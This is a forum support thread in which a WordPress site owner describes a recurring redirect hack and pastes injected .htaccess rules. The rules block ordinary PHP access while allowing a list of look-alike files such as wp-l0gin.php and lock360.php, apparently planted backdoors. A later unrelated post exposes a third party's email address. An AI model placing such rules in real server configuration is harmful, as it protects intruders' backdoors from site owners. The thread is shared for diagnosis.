Attacked my redirect malware, htaccess file has spammmy code, they come back.

najarine

my site is attacked my malware, its getting redirected to a spammy site when coming from google SAERP, there is spammy codes in my htaccess file, no matter how many times i remove it, it comes back the next day.
there is no nulled plugin or theme in my site. please help!

cjsmith

Hi najarine,

Hope you're well.

I was unable to replicate this from my end. Have you confirmed that this issue is happening on multiple devices?

If your site has been hacked, this is almost always because a plugin or your theme has become compromised. What tests have you run to rule this out?

We also recommend that you install WordFence on your site for additional protection, and as you are Cloudflare integrated, take advantage of their relevant security features.

Best wishes,

Chris

najarine

Hey Chris,

hope you are well.

I have just found out that its not redirecting from my office computer, but its redirecting from my phone.

I suspect you are not seeing the problem because of caching.

every night i am fixing the htaccess file from ezoic sftp and the malicious code is coming back in the htaccess file the next day, I think google has taken the cache from when I fixed the htaccess (the redirect only happens when coming from google, normal links wont redirect),

but I am sure the malware is there.

When the malicious code is in the htaccess, i can not even login to the admin, if i login to the admin, it can not get the css, and sometimes when it gets the css, no link in the admin works, says it forbidden to view this page, and if i try to go to the wordfence, wordfence asks to configure, and when i try to configure, it says loading and then nothing happens.

I have tried sucuri, wordfence, all in one wordpress security, ithemes security, shield, etc, nothing works.

I have tried to delete everything except wp-content folder and install wordpress again, but it doesnt work also

the malicious code gets back again and again.

I am pasting the code from htaccess file here. can you please have a look?

<FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(index.php|lock360.php|wp-l0gin.php|wp-the1me.php|wp-scr1pts.php|wp-admin.php|radio.php|content.php|about.php|wp-login.php|admin.php|mah.php|jp.php|ext.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>

JeanPierre

najarine You may need to try disabling plugins or using a default theme to locate the source of the issue.

Lianauae

Sorry for posting here, but here my out someone changed my friend's ezoic account email address from nowhere.

Please help him to retreive his account, he was able to login yesterday but can't now. There is no option to contact ezoic staff also from his side thats why I have to tell this. Here is email address padolea3@gmail.com and his site readhoot.com

Lindsey_

Lianauae Hi there - Lindsey here from your additional thread with us. I have just responded to you within said thread and can reassure you that we are currently investigating this within a ticket created by the publisher.

Thank you for reaching out in community, as well in support, but we would advise that your friend continue with the ticket created with us for further discussion as a new reply has been sent to them.